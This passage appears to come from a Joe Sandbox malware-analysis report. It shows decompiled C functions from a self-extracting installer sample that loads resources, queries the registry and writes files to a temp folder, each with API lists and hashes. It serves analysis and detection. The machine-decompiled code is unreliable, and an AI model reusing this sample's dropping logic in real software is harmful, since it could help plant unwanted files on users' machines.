								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00022A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00022A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

































                                                                                                                                                                                                                                                0x000228f1
                                                                                                                                                                                                                                                0x000228f4
                                                                                                                                                                                                                                                0x000228f7
                                                                                                                                                                                                                                                0x000228f9
                                                                                                                                                                                                                                                0x000228fc
                                                                                                                                                                                                                                                0x000228ff
                                                                                                                                                                                                                                                0x00022901
                                                                                                                                                                                                                                                0x00022907
                                                                                                                                                                                                                                                0x00022a62
                                                                                                                                                                                                                                                0x00022a64
                                                                                                                                                                                                                                                0x0002290d
                                                                                                                                                                                                                                                0x0002290d
                                                                                                                                                                                                                                                0x0002290f
                                                                                                                                                                                                                                                0x00022912
                                                                                                                                                                                                                                                0x00022920
                                                                                                                                                                                                                                                0x00022937
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022944
                                                                                                                                                                                                                                                0x0002294a
                                                                                                                                                                                                                                                0x0002294f
                                                                                                                                                                                                                                                0x00022a2f
                                                                                                                                                                                                                                                0x00022a32
                                                                                                                                                                                                                                                0x00022a34
                                                                                                                                                                                                                                                0x00022a37
                                                                                                                                                                                                                                                0x00022a41
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022955
                                                                                                                                                                                                                                                0x0002295e
                                                                                                                                                                                                                                                0x00022962
                                                                                                                                                                                                                                                0x00022969
                                                                                                                                                                                                                                                0x0002296f
                                                                                                                                                                                                                                                0x00022974
                                                                                                                                                                                                                                                0x0002298c
                                                                                                                                                                                                                                                0x00022a20
                                                                                                                                                                                                                                                0x00022a21
                                                                                                                                                                                                                                                0x00022a27
                                                                                                                                                                                                                                                0x00022a4c
                                                                                                                                                                                                                                                0x00022a4f
                                                                                                                                                                                                                                                0x00022a50
                                                                                                                                                                                                                                                0x00022a53
                                                                                                                                                                                                                                                0x00022a56
                                                                                                                                                                                                                                                0x00022a5c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000229b2
                                                                                                                                                                                                                                                0x000229b2
                                                                                                                                                                                                                                                0x000229b5
                                                                                                                                                                                                                                                0x000229bd
                                                                                                                                                                                                                                                0x000229c3
                                                                                                                                                                                                                                                0x000229cc
                                                                                                                                                                                                                                                0x000229d5
                                                                                                                                                                                                                                                0x000229d7
                                                                                                                                                                                                                                                0x000229da
                                                                                                                                                                                                                                                0x000229dd
                                                                                                                                                                                                                                                0x000229df
                                                                                                                                                                                                                                                0x000229ec
                                                                                                                                                                                                                                                0x000229f8
                                                                                                                                                                                                                                                0x000229fc
                                                                                                                                                                                                                                                0x000229ff
                                                                                                                                                                                                                                                0x00022a02
                                                                                                                                                                                                                                                0x00022a07
                                                                                                                                                                                                                                                0x00022a0a
                                                                                                                                                                                                                                                0x00022a0f
                                                                                                                                                                                                                                                0x00022a19
                                                                                                                                                                                                                                                0x00022a81
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022a0f
                                                                                                                                                                                                                                                0x0002298c
                                                                                                                                                                                                                                                0x00022974
                                                                                                                                                                                                                                                0x00022962
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002294f
                                                                                                                                                                                                                                                0x00022912
                                                                                                                                                                                                                                                0x00022a65
                                                                                                                                                                                                                                                0x00022a68
                                                                                                                                                                                                                                                0x00022a6c
                                                                                                                                                                                                                                                0x00022a6f
                                                                                                                                                                                                                                                0x00022a6f
                                                                                                                                                                                                                                                0x00022a7d

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalFree.KERNEL32 ref: 00022A6F
                                                                                                                                                                                                                                                  • Part of subcall function 00022773: CharUpperA.USER32(F4950D3E,00000000,00000000,00000000), ref: 000227A8
                                                                                                                                                                                                                                                  • Part of subcall function 00022773: CharNextA.USER32(0000054D), ref: 000227B5
                                                                                                                                                                                                                                                  • Part of subcall function 00022773: CharNextA.USER32(00000000), ref: 000227BC
                                                                                                                                                                                                                                                  • Part of subcall function 00022773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00022829
                                                                                                                                                                                                                                                  • Part of subcall function 00022773: RegQueryValueExA.ADVAPI32(?,00021140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00022852
                                                                                                                                                                                                                                                  • Part of subcall function 00022773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00022870
                                                                                                                                                                                                                                                  • Part of subcall function 00022773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000228A0
                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00023938,?,?,?,?,-00000005), ref: 00022958
                                                                                                                                                                                                                                                • GlobalLock.KERNEL32 ref: 00022969
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00023938,?,?,?,?,-00000005,?), ref: 00022A21
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00022A81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3949799724-0
                                                                                                                                                                                                                                                • Opcode ID: 952d0815a557059c7cf947da2a89bdc67af792d7f6623af8818949b28ab75629
                                                                                                                                                                                                                                                • Instruction ID: b385c5ba7f08713369741a9a491cf122006cf54212aaa116c9d72299ae99d1e2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 952d0815a557059c7cf947da2a89bdc67af792d7f6623af8818949b28ab75629
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC510C31E00229EFDB21DFD8E885AAEFBB9FF48700F14416AE915E3211DB359941DB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00024169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                                                                                                                			E00024169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0002468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0002468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E000244B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E000244B9(0, 0x4b5, 0, 0, 0x10, 0);
			}





                                                                                                                                                                                                                                                0x0002417d
                                                                                                                                                                                                                                                0x0002418f
                                                                                                                                                                                                                                                0x00024193
                                                                                                                                                                                                                                                0x000241b7
                                                                                                                                                                                                                                                0x000241d3
                                                                                                                                                                                                                                                0x000241e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000241e7
                                                                                                                                                                                                                                                0x000241d5
                                                                                                                                                                                                                                                0x000241d6
                                                                                                                                                                                                                                                0x000241d8
                                                                                                                                                                                                                                                0x000241d9
                                                                                                                                                                                                                                                0x000241da
                                                                                                                                                                                                                                                0x000241df
                                                                                                                                                                                                                                                0x000241e1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000241e1
                                                                                                                                                                                                                                                0x000241b9
                                                                                                                                                                                                                                                0x000241ba
                                                                                                                                                                                                                                                0x000241bc
                                                                                                                                                                                                                                                0x000241bd
                                                                                                                                                                                                                                                0x000241be
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000241be
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,000230B4), ref: 00024189
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,000230B4), ref: 000241E7
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                                • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                                • Opcode ID: 6e24c87e31700a1725ef4aa6172e8acabab60d24c607c634eb5aeb08d52bf523
                                                                                                                                                                                                                                                • Instruction ID: 613aa657e4b4f98414d978b96a0c2d7ee560c0cfcf3bf8ba6e24ddf50c6af803
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e24c87e31700a1725ef4aa6172e8acabab60d24c607c634eb5aeb08d52bf523
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8801D1B17002347FF3342665AC86FBB218EDBD5795F104026BB06E11819E6CCC1141B6
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00027155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00027155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x28004; // 0xf4950d3e
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x28004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x28004 = _t39;
				}
				_t37 =  !_t36;
				 *0x28008 = _t37;
				return _t37;
			}











                                                                                                                                                                                                                                                0x0002715d
                                                                                                                                                                                                                                                0x00027161
                                                                                                                                                                                                                                                0x00027165
                                                                                                                                                                                                                                                0x00027178
                                                                                                                                                                                                                                                0x00027182
                                                                                                                                                                                                                                                0x0002718e
                                                                                                                                                                                                                                                0x00027197
                                                                                                                                                                                                                                                0x000271a0
                                                                                                                                                                                                                                                0x000271b1
                                                                                                                                                                                                                                                0x000271b8
                                                                                                                                                                                                                                                0x000271c4
                                                                                                                                                                                                                                                0x000271c7
                                                                                                                                                                                                                                                0x000271cb
                                                                                                                                                                                                                                                0x000271d5
                                                                                                                                                                                                                                                0x000271da
                                                                                                                                                                                                                                                0x000271da
                                                                                                                                                                                                                                                0x000271dc
                                                                                                                                                                                                                                                0x000271dc
                                                                                                                                                                                                                                                0x000271e2
                                                                                                                                                                                                                                                0x000271e5
                                                                                                                                                                                                                                                0x000271ee

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00027182
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00027191
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0002719A
                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 000271A3
                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 000271B8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1445889803-0
                                                                                                                                                                                                                                                • Opcode ID: a0c7f4617daaa75257457d6452a15ccecd0cd0aba2c6721d22f8121642e781b2
                                                                                                                                                                                                                                                • Instruction ID: 40ae0367ff6d12209bb196e581325649cd83621ab071ad84f628857ae28b6dd2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0c7f4617daaa75257457d6452a15ccecd0cd0aba2c6721d22f8121642e781b2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1115E75E01218DFDB60DFB8EA48A9EB7F4FF08320F618855D805E7210EB389A158B41
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000219E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E000219E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x28004; // 0xf4950d3e
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E000243D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x29a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00026CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}













                                                                                                                                                                                                                                                0x000219e0
                                                                                                                                                                                                                                                0x000219e0
                                                                                                                                                                                                                                                0x000219eb
                                                                                                                                                                                                                                                0x000219f2
                                                                                                                                                                                                                                                0x000219f9
                                                                                                                                                                                                                                                0x000219fc
                                                                                                                                                                                                                                                0x00021a01
                                                                                                                                                                                                                                                0x00021a2a
                                                                                                                                                                                                                                                0x00021a2e
                                                                                                                                                                                                                                                0x00021a3e
                                                                                                                                                                                                                                                0x00021a4f
                                                                                                                                                                                                                                                0x00021a62
                                                                                                                                                                                                                                                0x00021a6a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021a03
                                                                                                                                                                                                                                                0x00021a06
                                                                                                                                                                                                                                                0x00021a20
                                                                                                                                                                                                                                                0x00021a20
                                                                                                                                                                                                                                                0x00021a08
                                                                                                                                                                                                                                                0x00021a08
                                                                                                                                                                                                                                                0x00021a14
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021a16
                                                                                                                                                                                                                                                0x00021a18
                                                                                                                                                                                                                                                0x00021a70
                                                                                                                                                                                                                                                0x00021a72
                                                                                                                                                                                                                                                0x00021a72
                                                                                                                                                                                                                                                0x00021a14
                                                                                                                                                                                                                                                0x00021a06
                                                                                                                                                                                                                                                0x00021a81

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00021A18
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00021A24
                                                                                                                                                                                                                                                • LoadStringA.USER32(?,?,00000200), ref: 00021A4F
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00021A62
                                                                                                                                                                                                                                                • MessageBeep.USER32(000000FF), ref: 00021A6A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1273765764-0
                                                                                                                                                                                                                                                • Opcode ID: 0b92e88652bba6681857a46feb46b58293618910c849e621572d9ee0d862bc90
                                                                                                                                                                                                                                                • Instruction ID: 37a3ad43dcc0969293c381dd96739c7b2e3702c008bab25a924f321f853bfe1b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b92e88652bba6681857a46feb46b58293618910c849e621572d9ee0d862bc90
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6411C8316011199FEB20EF64EE09AEE77B8EF59310F208155F912D3191DE349E12CB96
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000263C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                                			E000263C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x28004; // 0xf4950d3e
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00021781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
				E0002658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x29124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x29124 = 0x80070052;
					_t37 = 0;
				}
				return E00026CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}















                                                                                                                                                                                                                                                0x000263cb
                                                                                                                                                                                                                                                0x000263d2
                                                                                                                                                                                                                                                0x000263d8
                                                                                                                                                                                                                                                0x000263ea
                                                                                                                                                                                                                                                0x000263f3
                                                                                                                                                                                                                                                0x00026401
                                                                                                                                                                                                                                                0x00026402
                                                                                                                                                                                                                                                0x00026410
                                                                                                                                                                                                                                                0x00026415
                                                                                                                                                                                                                                                0x00026433
                                                                                                                                                                                                                                                0x00026438
                                                                                                                                                                                                                                                0x00026449
                                                                                                                                                                                                                                                0x00026463
                                                                                                                                                                                                                                                0x0002646d
                                                                                                                                                                                                                                                0x00026477
                                                                                                                                                                                                                                                0x00026477
                                                                                                                                                                                                                                                0x0002647a
                                                                                                                                                                                                                                                0x0002643a
                                                                                                                                                                                                                                                0x0002643a
                                                                                                                                                                                                                                                0x00026444
                                                                                                                                                                                                                                                0x00026444
                                                                                                                                                                                                                                                0x00026492

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0002642D
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0002645B
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0002647A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000263EB
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                                • API String ID: 1065093856-1116576409
                                                                                                                                                                                                                                                • Opcode ID: 5f239c5b75a2665bb90a8d52d8e5b75bbda4abb2480f4d7b7e755be55504408b
                                                                                                                                                                                                                                                • Instruction ID: 61080dc8991243b533c7c8434f4bd909362bdf16929e68cb9fde5246f4cd94bc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f239c5b75a2665bb90a8d52d8e5b75bbda4abb2480f4d7b7e755be55504408b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F21D571A00228AFD720DF25ECC5FEB73BCEB49314F104169F985A3180DAB55D858F64
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000247E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000247E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
